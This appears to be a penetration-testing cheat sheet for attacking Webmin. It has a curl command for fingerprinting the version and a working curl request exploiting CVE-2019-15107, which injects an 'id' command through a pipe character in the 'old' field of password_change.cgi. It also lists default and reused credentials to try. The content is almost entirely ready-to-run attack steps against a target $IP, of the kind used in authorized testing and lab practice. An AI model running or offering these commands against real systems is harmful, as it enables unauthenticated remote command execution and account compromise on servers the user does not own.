Webmin

What it is: Web-based system administration tool for Unix/Linux. Manages users, services, configs through a browser interface. Usually runs on port 10000 with HTTPS.

Default ports: 10000

Vuln research:


Identify Webmin version

Usually on port 10000 — Check login page source

curl -sk https://$IP:10000/ | grep -i version

Webmin RCE (CVE-2019-15107)

Unauthenticated RCE on Webmin 1.890-1.920 — Password reset backdoor

curl -sk "https://$IP:10000/password_change.cgi" -d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'

Default credentials

Common Webmin logins — Check for password reuse with system accounts

# root:<system password>
# admin:admin
# Webmin uses PAM by default = system credentials work